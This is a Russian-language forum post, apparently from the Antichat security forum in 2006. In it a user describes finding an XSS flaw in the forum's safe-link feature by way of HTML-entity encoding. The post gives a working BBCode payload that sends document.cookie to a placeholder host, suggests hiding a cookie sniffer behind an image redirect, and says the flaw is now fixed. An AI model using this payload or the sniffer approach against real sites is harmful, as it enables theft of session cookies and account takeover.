ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Xss на форуме Античата
  #1  
Старый 29.07.2006, 20:26
Аватар для hidden
hidden
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054

Репутация: 1292


По умолчанию Xss на форуме Античата

Как начался мой поиск уязвимости:

Просто мне сразу не очень понравилась идея мо скриптизацией форума, отчасти из за того что это сложнее защитить, и ещё потаму что я стараюсь практически не использовать js. Kill JavaScript И чтож, я решил проверить, насколько безопастдо это сделано, я тутже подставил в ссылку ' естественно это не прокатило, а так как я читал перед этим статьи с главной страници ачата, я вспомнил что если в js подставлять символы в виде &#HH, и они будут воспринематься как обычные символы, я подставил &#39 но или я читал не очень внимательно или там небыло написанно про то что ; после этого символа не только не воспринемается но и закрывает его, во всяком случае символ ; не указан в нижней таблице Взлом чатов by Algol. Теория и Практика. (страница 2), когда я подставил туда &#39 форум заменил символ & на &, на этом я и прекратил поиски.

Потом я гдкто увиде, что можно и нужно писать их все с ; (все имел введу таблицу), я подставил, ' и увидел его в сорцах таким как и подставил, и я не долго думая закрыл открытую кавычку адреса подставил любимую переменную и сново открыл кавычку, чтобы форум её закрыл сам, в ркзультаттк получилась такая строка.

[url=http://xxx.yyy/zzz.php?'+document.cookie+'ok]Test[/url]

результат:
<span title="Безопасная ссылка, Referer не передается: http://xxx.yyy/zzz.php?&#39;&#43;document.cookie&#43;&#39;ok" style="text-decoration:underline; cursor: pointer;" onclick="window.open('http://xxx.yyy/zzz.php?&#39;&#43;document.cookie&#43;&#39;ok');">Test</span>

Как видно из примера, в скрипте "http://xxx.yyy/zzz.php" можно поставить снифер, а можно тудаже и редирект например на картинку, тогда никто не догалался бы что это снифер .

P.S. Я повыделял это красным потому что форум фильтрует эти симыолы, а если их разделить другим тэго то всё норм

P.P.S. Уязвимость, на данный момент, исправлена
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Свеженькая XSS уязвимость в форуме mybb 1.10 Vantuz86 Форумы 0 11.04.2006 22:58



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ